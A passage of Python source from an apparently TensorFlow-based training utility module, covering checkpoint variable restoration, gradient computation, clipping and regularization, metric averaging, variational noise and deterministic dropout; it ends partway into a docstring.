def OverrideVarsFromCheckpoint(sess, all_vars, checkpoint_path,
variable_loading_rules, var_ignore_rules):
"""Overrides variables from a provided checkpoint."""
vars_to_load = _GetVarsToLoad(all_vars, variable_loading_rules,
var_ignore_rules)
if not vars_to_load:
raise ValueError(('Variable loading rules did not match any vars. '
'All known: %r') % [v.name for v in all_vars])
load_var_names = sorted([v.name for _, v in vars_to_load])
tf.logging.info('Overriding vars from checkpoint: %r', load_var_names)
while vars_to_load:
# When restoring, it's possible the same value in the checkpoint
# can be restored to multiple variables (e.g. during
# distillation). However, tf.train.Saver, since it's used for
# both saving and restoring, requires the name in the checkpoint
# to be unique for each variable. So, we call it multiple times
# with a unique set of names each time.
unique_vars_to_load = {}
remaining_vars_to_load = []
for k, v in vars_to_load:
if k not in unique_vars_to_load:
unique_vars_to_load[k] = v
else:
remaining_vars_to_load.append((k, v))
tf.train.Saver(var_list=unique_vars_to_load).restore(sess, checkpoint_path)
vars_to_load = remaining_vars_to_load
def OverrideVarsFromCheckpoints(session, all_vars, ckpts_loading_rules):
"""Overrides model variables from checkpoints.
Args:
session: Tensorflow session.
all_vars: List of all the parameters in the model.
ckpts_loading_rules: A dictionary of checkpoint path: loading rules.
Checkpoint path must be a path to a pretrained model, and loading rules is
expected to be a tuple of two lists. The first consisting of tuples of
strings defining (regex to match parameter names in the model to override,
format string to determine the corresponding var in the checkpoint), and
the second list consisting of a list of regexes to match parameter names
in the model which should not be overridden, even if they match those in
the loading rules.
Raises:
ValueError: if colliding vars exist or loading rules is not a list.
"""
if len(ckpts_loading_rules) > 1:
tf.logging.info('Overriding vars from multiple checkpoints.')
var_refs_overridden = set()
for ckpt_path, loading_rules in ckpts_loading_rules.items():
tf.logging.info('Overriding vars from checkpoint: %s', ckpt_path)
if not isinstance(loading_rules, tuple):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
if len(loading_rules) != 2 or not all(
isinstance(l, list) for l in loading_rules):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
# Filter the model variables to be overridden.
var_refs_to_override = [
var[1].experimental_ref()
for var in _GetVarsToLoad(all_vars, loading_rules[0], loading_rules[1])
]
overlap_refs = set.intersection(var_refs_overridden, var_refs_to_override)
if overlap_refs:
raise ValueError('Colliding variables to override: %s' % overlap_refs)
OverrideVarsFromCheckpoint(session, all_vars, ckpt_path, loading_rules[0],
loading_rules[1])
var_refs_overridden.update(var_refs_to_override)
tf.logging.info('Model variables overridden: %s', var_refs_overridden)
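# Illustrative sketch (not from the original source) of the expected structure
# of 'ckpts_loading_rules'; the checkpoint path and variable names below are
# hypothetical.
#
#   ckpts_loading_rules = {
#       '/path/to/pretrained/ckpt-100000': (
#           # (regex over model var names, format string of checkpoint names).
#           [('(.*)/my_encoder/(.*)', '%s/encoder/%s')],
#           # Regexes of model vars that must not be overridden.
#           ['.*global_step.*'],
#       ),
#   }
#   OverrideVarsFromCheckpoints(sess, tf.global_variables(), ckpts_loading_rules)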
def ComputeGradientsSimple(loss, all_vars, grad_aggregation_method,
colocate_gradients_with_ops, gate_gradients):
return tf.gradients(
loss,
all_vars,
aggregation_method=grad_aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops,
gate_gradients=gate_gradients)
def ComputeTpuEmbeddingGradients(loss, activation_dict, tpu_embedding):
"""Returns a TpuEmbedding SendGradient op.
Args:
loss: The loss to backprop from.
activation_dict: String feature -> embedding activations dict.
tpu_embedding: TPUEmbedding instance.
"""
# Scale the loss to account for the full batch size.
shards = tpu_function.get_tpu_context().number_of_shards
loss *= tf.constant(1.0 / shards, dtype=loss.dtype)
grads = tf.gradients(loss, list(activation_dict.values()))
feature_to_gradient_dict = py_collections.OrderedDict(
zip(list(activation_dict.keys()), grads))
send_gradient_op = tpu_embedding.generate_send_gradients_op(
feature_to_gradient_dict)
return send_gradient_op
def _ComputeGradientsTpu(loss,
all_vars,
grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients,
skip_zero_gradients=None):
"""Computes gradients for local loss across whole TPU cluster.
  This implementation specializes for the case where weight params may be used
  a different number of times in the forward computation, so that gradients
  should be normalized by the actual number of times they are computed.
TODO(yonghui): Maybe merge this implementation with the _ComputeGradientsTpu
one.
Args:
loss: The loss to backprop from.
all_vars: Vars with respect to which gradients are to be computed.
grad_aggregation_method: aggregation method to use when calling
tf.gradients.
colocate_gradients_with_ops: boolean, whether or not to colocate gradient op
with the original op.
gate_gradients: boolean, flag to be passed to tf.gradients.
skip_zero_gradients: whether to skip zero gradients during aggregation.
Returns:
Gradients to be passed back.
Raises:
ValueError: upon invalid arguments.
"""
if not skip_zero_gradients:
# Scale the loss to account for the full batch size.
shards = tpu_function.get_tpu_context().number_of_shards
assert shards
loss *= tf.constant(1.0 / shards, dtype=loss.dtype)
# Computes the gradients.
# Sum the grads so that we can compute statistics across the whole batch.
all_grads = ComputeGradientsSimple(loss, all_vars, grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients)
# NOTE: We can't use tpu_optimizer.CrossShardOptimizer since
# we need to scale the grads *after* the cross_replica_sum to
# match GPU version!
# TODO(cwhipkey): should we do something different here? - we could do
# some operations on the gradients before the aggregation (see comments in
# tensorflow/contrib/tpu/python/tpu/tpu_optimizer.py - see compute_gradients -
# for some more details).
aggregated_grads = []
for g in all_grads:
if g is None:
aggregated_grads.append(None)
continue
with tf.colocate_with(g):
if skip_zero_gradients is None:
# loss is already scaled by 1/shards.
normalized_g = tf.tpu.cross_replica_sum(g)
else:
# Compute the cross-replica mean of 'g', skipping zero gradients.
# Q(yonghui): Is there a better way to detect a non-zero gradient?
# Note(yonghui): gradient of a weight can be zero if that
# weight is not used in the forward computation, e.g. as in
# switchable layers in neural architecture search, pruned by channel
# mask, or sparsified.
if skip_zero_gradients == 'weight':
# Same shape as 'g'.
g_is_non_zero = tf.cast(tf.math.abs(g) > 1e-8, g.dtype)
elif skip_zero_gradients == 'variable':
# A variable-wide 0/1 scalar.
g_is_non_zero = tf.cast(
tf.reduce_sum(tf.math.abs(g)) > 1e-24, g.dtype)
else:
raise ValueError('Unknown skip_zero_gradients: %s' %
skip_zero_gradients)
num_updates = tf.maximum(tf.tpu.cross_replica_sum(g_is_non_zero), 1.0)
normalized_g = tf.tpu.cross_replica_sum(g) / num_updates
aggregated_grads.append(normalized_g)
return aggregated_grads
class VarGrad(object):
"""A class that holds a variable and a gradient."""
_VAR_GRAD = py_collections.namedtuple('VarGradNamedTuple', ['var', 'grad'])
def __init__(self, *args, **kwargs):
self._var_grad = self._VAR_GRAD(*args, **kwargs)
def __getitem__(self, key):
return self._var_grad[key]
def __getattr__(self, key):
return getattr(self._var_grad, key)
def __iter__(self):
return iter(self._var_grad)
def __repr__(self):
return 'VarGrad(%r, %r)' % (self._var_grad.var, self._var_grad.grad)
def ComputeGradients(
loss,
vmap,
grad_aggregation_method=tf.AggregationMethod.EXPERIMENTAL_TREE,
colocate_gradients_with_ops=True,
gate_gradients=False,
compute_gradients_fn=None,
skip_zero_gradients=None):
"""Computes gradients of variables in vmap w.r.t loss.
Args:
loss: A scalar Tensor.
vmap: A `.NestedMap` of variables.
grad_aggregation_method: Specifies the method used to combine gradient
terms. Accepted values are constants defined in the class
AggregationMethod.
colocate_gradients_with_ops: If True, try colocating gradients with the
corresponding op.
gate_gradients: If True, add a tuple around the gradients returned for an
      operation. This avoids some race conditions.
compute_gradients_fn: Function to use to compute gradients. If None, use
default. compute_gradients_fn should have the same signature as this
function, but without the last argument.
skip_zero_gradients: Whether to skip aggregating zero gradients. This helps
in case where some weights may not be used in forward computation, e.g.,
sparsely activated networks or switchable layers in neural architectural
search. Only applicable on TPU.
Possible values are:
* None: do not skip zero gradients;
* `variable`: skip if the entire variable's gradients are almost zero;
reduce_sum(abs(grads)) < 1e-8.
* `weight`: skip if the individual weight's gradients are almost zero:
abs(grad) < 1e-8.
Returns:
var_grad - a `.NestedMap` of VarGrad. You can view
var_grad as an ordered list of (key, (var, grad)) tuples. Every
key of var_grad exists in vmap. Every variable in vmap that
contributes to loss must exist in var_grad. Every var of var_grad
must exist in vmap. grad is the corresponding gradient computed
for var. grad is guaranteed to be not None.
"""
loss = HasRank(loss, 0)
assert isinstance(vmap, NestedMap)
assert skip_zero_gradients in (None, 'variable', 'weight')
# Uniqify and remove None.
filtered_vmap = vmap.Filter(_Unique())
assert filtered_vmap is not None
# Filter out variables not contributing to 'loss'.
trainable_variables = set(tf.trainable_variables())
dependent_ops_and_tensors = set(FindNeeded([loss]))
def Needed(v):
if isinstance(v, tf.Variable):
if v not in trainable_variables:
# Skip non-trainable variables. Otherwise,
# tf.Optimizer.apply_gradients throws up an exception instead
# of skipping the update.
return False
return True
filtered_vmap = filtered_vmap.Filter(Needed)
assert filtered_vmap is not None
filtered_vlist = filtered_vmap.Flatten()
# Use caller-supplied gradient function if supplied.
if compute_gradients_fn is not None:
take_grad = compute_gradients_fn
else:
# tpu vs non-tpu is slightly different.
if use_tpu():
take_grad = functools.partial(
_ComputeGradientsTpu, skip_zero_gradients=skip_zero_gradients)
else:
take_grad = ComputeGradientsSimple
grads = take_grad(loss, filtered_vlist, grad_aggregation_method,
colocate_gradients_with_ops, gate_gradients)
# Formulate pairs of (var, grad) and pack them into the same
# structure as filtered_vmap.
var_grads = filtered_vmap.Pack(
[VarGrad(v, g) for v, g in zip(filtered_vlist, grads)])
# TPU training is not compatible with the variable name check below when
# control flow v2 is enabled. The main reason is the body function will be
# encapsulated as a TF function while variables will be lifted out, and as a
# result dependent_ops_and_tensors will not contain any variables. See
# b/150689507 for more info.
if not tf.compat.v1.control_flow_v2_enabled():
    # Check that the gradient of any variable not needed by the current task
    # is None.
def CheckGrad(vg):
if vg.var.name not in dependent_ops_and_tensors and vg.grad is not None:
err_msg = ('Variable %s is not a dependent of %s, expect '
'gradient be None, but got %s. This should not happen, '
'please contact the owner of b/150689507 for further '
'investigation.' % (str(vg.var), str(loss), str(vg.grad)))
assert False, err_msg
return True
var_grads = var_grads.Filter(CheckGrad)
# Removes pairs whose grad is None.
for key, (_, g) in var_grads.FlattenItems():
if g is None:
tf.logging.info('ComputeGradients drops %s', key)
return var_grads.Filter(lambda var_grad: var_grad.grad is not None)
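# Illustrative usage sketch (not from the original source), assuming 'loss' is
# a scalar Tensor and 'model_vars' is a NestedMap of trainable tf.Variables:
#
#   var_grads = ComputeGradients(loss, model_vars)     # NestedMap of VarGrad
#   var_grads = ApplyGradMultiplier(var_grads, 0.5)    # defined below
#   for name, (v, g) in var_grads.FlattenItems():
#     tf.logging.info('grad for %s: %s', name, g)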
def MaskGradients(var_grad, grad_mask):
"""Computes gradients of non-masked variables in vmap w.r.t loss.
Args:
var_grad: A `.NestedMap` of (variable, gradient)
grad_mask: A dict of (variable name, mask).
Returns:
var_grad - a `.NestedMap` of (variable, mask * gradient).
"""
def ApplyMask(entry):
var, grad = entry
mask = grad_mask[var.name]
if isinstance(grad, tf.IndexedSlices):
return VarGrad(var, tf.IndexedSlices(grad.values * mask, grad.indices))
else:
return VarGrad(var, grad * mask)
return var_grad.Transform(ApplyMask)
def ApplyGradMultiplier(vs_gs, grad_scale=None):
"""Scale gradients by grad_scale on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
grad_scale: If None, each vs_gs entry has the scale. Otherwise, grad_scale
applies to every entry.
Returns:
A `.NestedMap` of (variable, gradient * grad_scale). In particular, if
grad_scale is 0, the result gradient is always 0, even if the input
gradient is inf or nan.
"""
def ScaleOrZero(var, grad, scale):
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.where(
tf.equal(scale, 0.), tf.zeros_like(grad),
tf.cast(scale, grad.dtype) * grad)
def Scale(item):
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
if grad_scale is None:
scale = item.scale
else:
scale = grad_scale
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ScaleOrZero(var, grad.values, scale), grad.indices,
grad.dense_shape)
else:
grad = ScaleOrZero(var, grad, scale)
return VarGrad(var, grad)
return vs_gs.Transform(Scale)
def HasNanOrInfGradient(var_grads):
"""Returns a bool tensor to indicate if `var_grads` contains NaNs or Infs.
Args:
var_grads: A `.NestedMap` with (var, grad) tuple as the map value.
Returns:
A bool scalar tensor to indicate if the `var_grads` contains NaNs or Infs.
"""
def HasNanOrInf(x):
if isinstance(x, tf.IndexedSlices):
x = x.values
with tf.device(x.device):
if x.dtype.is_complex:
return tf.reduce_any([HasNanOrInf(tf.real(x)), HasNanOrInf(tf.imag(x))])
return tf.reduce_any(tf.logical_or(tf.is_nan(x), tf.is_inf(x)))
return tf.reduce_any([HasNanOrInf(g) for (_, g) in var_grads.Flatten()])
def ApplyGradNormClipping(vs_gs, norm=1.0):
"""Clip gradients to norm on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
norm: Each tensor's gradient will be scaled down to have a maximum L2-norm
value of `norm`.
Returns:
    A `.NestedMap` of VarGrad(variable, clipped_gradient), where each
    gradient's L2 norm is clipped to be at most `norm`.
"""
def ClipByNorm(var, grad, norm):
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.clip_by_norm(grad, norm)
def Clip(item):
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ClipByNorm(var, grad.values, norm), grad.indices, grad.dense_shape)
else:
grad = ClipByNorm(var, grad, norm)
return VarGrad(var, grad)
return vs_gs.Transform(Clip)
SKIP_LP_REGULARIZATION = '__lingvo_skip_lp_regularization'
def AdjustGradientsWithLpLoss(var_grads, lp_regularizer_weight, p=2.0):
"""Adjusts the map of (var, grad) with Lp regularization, where p=1.0 or 2.0.
Args:
var_grads: a `.NestedMap` or list of (variable, gradient).
lp_regularizer_weight: Lp regularization weight.
p: For now we support 1.0 or 2.0.
Returns:
A tuple (lp_loss, var_grads).
- lp_loss: A scalar. The lp loss.
- var_grads: a `.NestedMap` or list of (variable, gradient) regulated by Lp.
"""
# TODO(yuancao): For now we support p=1 or 2, but this can be extended to
# lp-norm in general.
assert p in [2.0, 1.0], 'For now we only support L1/L2 regularization.'
def GetVar(item):
var, grad = item
if isinstance(grad, tf.IndexedSlices):
with tf.device(var.device):
ids = HasRank(grad.indices, 1)
uniq_ids = tf.unique(ids).y
return tf.gather(var, uniq_ids)
else:
return var
def ShouldAdjust(v):
return v not in tf.get_collection(SKIP_LP_REGULARIZATION)
filtered_var_grads = [
var_grad for var_grad in Flatten(var_grads) if ShouldAdjust(var_grad.var)
]
filtered_vars = Transform(GetVar, filtered_var_grads)
for v in filtered_vars:
tf.logging.info('AdjustGradientsWithLpLoss: %s', v.name)
if p == 2.0:
lp_loss = 0.5 * lp_regularizer_weight * SumSquared(filtered_vars)
elif p == 1.0:
lp_loss = lp_regularizer_weight * SumAbs(filtered_vars)
def LpGrad(var_grad):
"""Adjusts item's grad w/ Lp loss term."""
var, grad = var_grad
if isinstance(grad, tf.IndexedSlices):
# Question(rpang): do we apply Lp loss here even if 'var' is in
# SKIP_LP_REGULARIZATION?
#
      # Note: IndexedSlices appears for embedding lookups.
      # Embedding lookup ids can have duplicates. For duplicated ids, we
      # only want to count each id once.
with tf.device(var.device):
emb = HasRank(var, 2)
vocab_size = tf.shape(emb)[0]
ids = HasRank(grad.indices, 1)
values = tf.gather(emb, ids) # [#ids, dims]
with tf.device(grad.device):
        # counts is a vector of size vocab_size; counts[i] is the number of
        # occurrences of the i-th word in 'ids'.
counts = tf.unsorted_segment_sum(
tf.ones_like(ids, dtype=values.dtype), ids, vocab_size)
# Gradients for duplicated ids will be summed when they get
# applied, and hence we account for that by first dividing
# gradient resulting from lp loss by how many times the id is
# duplicated.
#
# For each id in 'ids', we know counts[id] is non-zero,
# hence, it's always safe to take reciprocal.
weights = tf.reciprocal(tf.gather(counts, ids))
weights = tf.expand_dims(weights, -1) # [#ids, 1]
if p == 2.0:
grad_v = values
elif p == 1.0:
grad_v = tf.sign(values)
delta = lp_regularizer_weight * weights * grad_v
grad = tf.IndexedSlices(grad.values + delta, ids)
elif var not in tf.get_collection(SKIP_LP_REGULARIZATION):
with tf.device(var.device):
if p == 2.0:
grad_v = var
elif p == 1.0:
grad_v = tf.sign(var)
delta = lp_regularizer_weight * grad_v
with tf.device(grad.device):
grad += delta
return VarGrad(var, grad)
return lp_loss, Transform(LpGrad, var_grads)
def SplitRecursively(x, num_splits, axis=-1):
"""Splits Tensors in 'x' recursively.
Args:
    x: a Tensor, or a list or NestedMap containing Tensors to split.
num_splits: number of splits per Tensor.
axis: the split axis.
Returns:
A list of split values of length 'num_splits'.
- If 'x' is a Tensor, a list of split Tensors.
- If 'x' is a list, a list of lists, where each sublist has the same length
as 'x' and the k'th element in each sublist corresponds to a split of the
k'th element from 'x'.
- If 'x' is a `.NestedMap`, a list of `.NestedMap`, where each field
corresponds to a split from the same field of 'x'.
"""
if isinstance(x, tf.Tensor):
return tf.split(x, num_splits, axis=axis)
elif isinstance(x, list):
splits = [SplitRecursively(element, num_splits, axis) for element in x]
splits = list(zip(*splits))
return [list(t) for t in splits]
elif isinstance(x, NestedMap):
results = [NestedMap() for _ in range(num_splits)]
for key, val in six.iteritems(x):
val_splits = SplitRecursively(val, num_splits, axis)
for i in range(num_splits):
results[i][key] = val_splits[i]
return results
else:
raise TypeError('Unexpected type for SplitRecursively: %s' % type(x))
def ConcatRecursively(splits, axis=-1):
"""Concatenates tensors from 'splits'.
This is the inverse function of SplitRecursively.
Args:
splits: a list of splits to concatenate, where elements can be Tensors,
lists, or `.NestedMap`. The elements must share the same type and
structure. For example, list elements must have the same length;
`.NestedMap` must have the same set of fields.
axis: the concatenation axis.
Returns:
Concatenated data.
- If input 'splits' are Tensors, returns a concatenated Tensor.
- If input 'splits' are lists, returns a list of the same length where the
k'th element represents concatenated data of the k'th element from each
split.
- If input 'splits' are `.NestedMap`, returns a `.NestedMap` with each field
concatenated from corresponding fields of input splits.
Raises:
TypeError: if 'splits' is not a list or elements of 'splits' do not have
known or matching types.
ValueError: if 'splits' is empty or elements of 'splits' do not have
matching structures.
"""
if not isinstance(splits, list):
raise TypeError('Non-list inputs for ConcatRecursively: %s' % splits)
if not splits:
raise ValueError('Empty inputs for ConcatRecursively: %s' % splits)
tmpl = splits[0]
if isinstance(tmpl, tf.Tensor):
return tf.concat(splits, axis=axis)
elif isinstance(tmpl, list):
if not all(isinstance(split, list) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
if not all(len(split) == len(tmpl) for split in splits):
raise ValueError('Length mismatch for ConcatRecursively: %s' % splits)
return [
ConcatRecursively([split[i]
for split in splits], axis)
for i in range(len(tmpl))
]
elif isinstance(tmpl, NestedMap):
if not all(isinstance(split, NestedMap) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
results = NestedMap()
for key in tmpl:
results[key] = ConcatRecursively([split[key] for split in splits], axis)
return results
else:
raise TypeError('Unexpected type for ConcatRecursively: %s' % type(splits))
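# Illustrative sketch (not from the original source): SplitRecursively and
# ConcatRecursively are inverses of each other. The field names below are made
# up.
#
#   batch = NestedMap(ids=tf.zeros([8, 10]), paddings=tf.zeros([8, 10]))
#   splits = SplitRecursively(batch, 2, axis=0)    # two NestedMaps, [4, 10] each
#   restored = ConcatRecursively(splits, axis=0)   # same shapes as 'batch'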
def AddToPruningCollections(weight,
mask,
threshold,
gradient=None,
old_weight=None,
old_old_weight=None):
"""Add mask, threshold, and weight vars to their respective collections."""
if mask not in tf.get_collection(pruning.MASK_COLLECTION):
tf.add_to_collection(pruning.WEIGHT_COLLECTION, weight)
tf.add_to_collection(pruning.MASK_COLLECTION, mask)
tf.add_to_collection(pruning.THRESHOLD_COLLECTION, threshold)
# Add gradient, old_weight, and old_old_weight to collections approximating
# gradient and hessian, where old_weight is the weight tensor one step
# before and old_old_weight is the weight tensor two steps before.
if gradient is not None:
assert old_weight is not None
assert old_old_weight is not None
tf.add_to_collection(pruning.WEIGHT_GRADIENT_COLLECTION, gradient)
tf.add_to_collection(pruning.OLD_WEIGHT_COLLECTION, old_weight)
tf.add_to_collection(pruning.OLD_OLD_WEIGHT_COLLECTION, old_old_weight)
def WeightedAvg(values, weights, sum_reduction_fn=tf.reduce_sum, name=''):
"""Computes weighted average of values from a tensor.
Args:
values: a tensor of values
weights: a tensor of weights
    sum_reduction_fn: called to reduce the values and weights to a single value.
name: name of metric.
Returns:
A tuple (avg, total_weight).
- avg: weighted average value
- total_weight: sum of all weights
"""
msg = 'shape of values and weights tensors must match for metric ' + name
values = with_dependencies(
[assert_equal(tf.shape(values), tf.shape(weights), message=msg)], values)
total_weight = sum_reduction_fn(weights)
avg = sum_reduction_fn(values * tf.cast(weights, values.dtype)) / tf.cast(
total_weight, values.dtype)
return avg, total_weight
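# Illustrative sketch (not from the original source): for values [2.0, 4.0]
# and weights [1.0, 3.0],
#
#   avg, total = WeightedAvg(tf.constant([2.0, 4.0]), tf.constant([1.0, 3.0]))
#
# evaluates to avg == (2 * 1 + 4 * 3) / 4 == 3.5 and total == 4.0.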
def WeightedAvgOfMetrics(metrics):
"""Computes the weighted average of metrics in the list.
Args:
metrics: list of dictionaries of metrics
Returns:
    ret_dict - dictionary of the weighted average of each metric.
"""
ret_dict = {}
lists_of_metrics = {}
for m in metrics:
for name, (value, weight) in six.iteritems(m):
if name not in lists_of_metrics:
lists_of_metrics[name] = []
lists_of_metrics[name].append((value, weight))
for name, values_and_weights in sorted(six.iteritems(lists_of_metrics)):
values = tf.stack([x[0] for x in values_and_weights])
weights = tf.stack([x[1] for x in values_and_weights])
ret_dict[name] = WeightedAvg(values, weights, tf.reduce_sum, name)
return ret_dict
def ConcatPerExampleTensors(per_example):
"""Concatenate per-example tensors from many hosts into one large block.
Args:
per_example: list of dictionaries of per-example tensors.
Returns:
ret_dict - string -> concatenated tensors.
"""
ret_dict = {}
lists_of_per_example = {}
for m in per_example:
for name, value in six.iteritems(m):
if name not in lists_of_per_example:
lists_of_per_example[name] = []
lists_of_per_example[name].append(value)
for name, values in sorted(six.iteritems(lists_of_per_example)):
ret_dict[name] = tf.concat(values, 0)
return ret_dict
def CombineMetrics(loss_metric_weight_pairs):
"""Combines metrics from `loss_metric_weight_pairs` according to weights.
  Each key must either exist in all metrics dicts, in which case it is combined
  as a weighted sum, or exist in exactly one metrics dict, in which case it is
  copied.
Args:
loss_metric_weight_pairs: a list of (metrics, weight) pairs, where each
weight is a float and each metrics is a dict with str keys and
(metric_value, target_weight) values.
Returns:
A dict with the same set of keys as input metrics and values of
(weighted_sum(metric_value), weighted_sum(target_weight)).
Raises:
ValueError: if there exists a metric that exists in more than one element
of `loss_metric_weight_pairs` but not in all of them.
"""
all_keys = set([
k for loss_metrics, _ in loss_metric_weight_pairs
for k in six.iterkeys(loss_metrics)
])
result = {}
for k in all_keys:
count = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
count += 1
if count > 1 and count != len(loss_metric_weight_pairs):
      raise ValueError('Found metric %s which exists in more than one '
                       'but not all loss metrics.' % k)
total_val = 0
total_target_weight = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
val, target_weight = loss_metrics[k]
if count == 1:
# Single metric, don't multiply by weight.
total_val = val * target_weight
total_target_weight = target_weight
else:
# Total weighted sum of all predictions.
total_val += weight * val * target_weight
total_target_weight += weight * target_weight
result[k] = (total_val / total_target_weight, total_target_weight)
return result
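# Illustrative sketch (not from the original source): combining the 'loss'
# metric of two tasks with task weights 0.7 and 0.3, where each metric value is
# a (value, target_weight) pair of Tensors.
#
#   combined = CombineMetrics([
#       ({'loss': (loss_a, weight_a)}, 0.7),
#       ({'loss': (loss_b, weight_b)}, 0.3),
#   ])
#   # combined['loss'][0] == (0.7 * loss_a * weight_a + 0.3 * loss_b * weight_b)
#   #                        / (0.7 * weight_a + 0.3 * weight_b)
#   # combined['loss'][1] == 0.7 * weight_a + 0.3 * weight_b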
def _AddVN(p, x, step=None):
assert p.vn.scale is not None
seed = p.vn.seed
if seed and step:
seed += step * 203984
noises = tf.cast(p.vn.scale, x.dtype) * tf.random_normal(
tf.shape(x), stddev=1.0, seed=seed, dtype=x.dtype)
return x + noises
def AddGlobalVN(params, weights):
"""Adds variational noise to weights if specified by params."""
p = params
if p.vn.global_vn:
weights = _AddVN(p, weights)
return weights
def AddPerStepVN(params, weights, step=None):
"""Adds per-setp variational noise to weights if specified by params."""
p = params
if p.vn.per_step_vn:
weights = _AddVN(p, weights, step)
return weights
def VariationalNoiseParams(scale,
global_vn=False,
per_step_vn=False,
seed=None):
"""Returns a hyperparams for variational noise."""
p = hyperparams.Params()
p.Define(
'scale', scale,
      'Std of the variational noise to apply. This can be a scalar,'
' or a scalar tensor.')
p.Define('global_vn', global_vn,
           'Adds global variational noise every training step iff True.')
p.Define('per_step_vn', per_step_vn,
           'Adds per-timestep variational noise iff True.')
p.Define('seed', seed, 'Random seed used to generate noise.')
return p
# To disable VN for a layer, we pass 1.0 as the first parameter of the
# following function; otherwise the result would be identical to the
# DefaultVN() configuration of base_layer, which gets overridden by the parent
# configuration in CopyBaseParams().
def DisableVN():
return VariationalNoiseParams(1.0, False, False)
def GetStepSeed():
"""Gets step_seed."""
step_seed_tensors = tf.get_default_graph().get_collection_ref('step_seed')
if not step_seed_tensors:
ResetStepSeed()
return GetStepSeed()
elif len(step_seed_tensors) == 1:
return step_seed_tensors[0]
else:
raise ValueError('Multiple tensors in step_seed collection.')
def ResetStepSeed(seed=0):
"""Resets step_seed to specified value."""
new_step_seed = tf.convert_to_tensor(seed, dtype=tf.int64)
step_seed_tensors = tf.get_default_graph().get_collection_ref('step_seed')
if len(step_seed_tensors) == 1:
step_seed_tensors[0] = new_step_seed
elif not step_seed_tensors:
tf.add_to_collection('step_seed', new_step_seed)
else:
raise ValueError('Multiple tensors in step_seed collection.')
def GetIncStepSeed():
"""Returns and increments the step_seed."""
step_seed = GetStepSeed()
# TODO(lepikhin): introduce a routine filling a queue of uint32 random seeds
# independent of underlying PRNG used by tensorflow.
ResetStepSeed(step_seed + 1)
return step_seed
def GenerateStepSeedPair(p, global_step, op_seed=None):
"""Generates a seed pair for deterministic random operations in functional loops.
This function retrieves a unique seed pair on each call, based off the current
global step and step seed. The step seed ensures this function returns a
unique seed pair on each call: calling this function automatically increments
the step seed. The step seed is automatically reset at the beginning of each
global step in the model's FProp and works transparently through recurrent.py.
Args:
p: A hyperparams.Params object, containing keys 'random_seed' and
'is_inference'.
global_step: The global step.
op_seed: An additional operation-level seed to apply.
Returns:
A size 2 tensor of op seeds to use for stateless_random ops.
"""
seed_dtype = tf.int32 if use_tpu() else tf.int64
if p.is_inference and p.random_seed is None:
# Ensure GetIncStepSeed is called even inside the shortcut.
    # This way, other ops that use this function with p.random_seed set will
    # get the same seed pair whether or not p.random_seed is set for this
    # specific call.
GetIncStepSeed()
# Unlike tf.random*, stateless random ops are completely determined by the
# passed-in seeds. This means at inference time the same inputs will produce
# the same outputs, even if the model is supposed to have randomness such as
# dropout during inference. We inject additional randomness only during
# inference if the graph is exported with random_seed=None as a workaround.
return tf.random_uniform([2], maxval=seed_dtype.max, dtype=seed_dtype)
global_step = tf.cast(global_step, seed_dtype)
step_seed = tf.cast(GetIncStepSeed(), seed_dtype)
seeds = tf.stack([global_step, step_seed])
if p.random_seed is not None:
seeds += p.random_seed
if op_seed is not None:
seeds += op_seed
return seeds
def DeterministicDropout(x, keep_prob, seeds, noise_shape=None, name=None):
"""Similar to `tf.nn.dropout()`, but fully deterministic.
Args:
x: A float Tensor on which to apply dropout.
keep_prob: A scalar `Tensor` of keep probability.
seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
generator.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated keep/drop flags.
name: An optional name for this operation.
Returns:
A Tensor with the same shape as `x`.
Raises:
InvalidArgumentError: if keep_prob is invalid.
"""
if isinstance(keep_prob, numbers.Real):
if keep_prob <= 0 or keep_prob > 1:
      raise tf.errors.InvalidArgumentError(
          None, None,
          'keep_prob must be in range (0, 1]. Value: {}'.format(keep_prob))
if keep_prob == 1:
return x
with tf.name_scope(name, 'dropout', [x]) as name:
if use_tpu():
seeds = tf.cast(seeds, tf.int32)
keep_prob = tf.convert_to_tensor(
keep_prob, dtype=tf.float32, name='keep_prob')
# uniform in [keep_prob, 1.0 + keep_prob)
# StatelessRandomUniform op does not support non-float (e.g. bfloat16) dtype
# and non-int32 seed types.
noise_shape = noise_shape or GetShape(x)
random_tensor = keep_prob + tf.random.stateless_uniform(
noise_shape, seed=seeds, dtype=tf.float32)
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
binary_tensor = tf.floor(random_tensor)
if x.dtype != tf.float32:
binary_tensor = tf.cast(binary_tensor, x.dtype)
keep_prob = tf.cast(keep_prob, dtype=x.dtype)
result = tf.div(x, keep_prob) * binary_tensor
result.set_shape(x.get_shape())
return result
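# Illustrative sketch (not part of the original module): deterministic dropout
# driven by a fixed seed pair, so the same mask is produced on every call with
# the same seeds. The seed values are arbitrary.
def _ExampleDeterministicDropout():
  x = tf.ones([4, 8], dtype=tf.float32)
  seeds = tf.constant([1234, 5678], dtype=tf.int32)
  # Keep 90% of activations; the dropped positions are fully determined by
  # `seeds`, unlike the stateful tf.nn.dropout.
  return DeterministicDropout(x, keep_prob=0.9, seeds=seeds)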
def DeterministicVN(params, seeds, noise_shape, mean=0.0, std=1.0, name=None):
"""Produces Fully deterministic Gaussian noise from shape, mean and std.
Args:
params: Nested map of params.
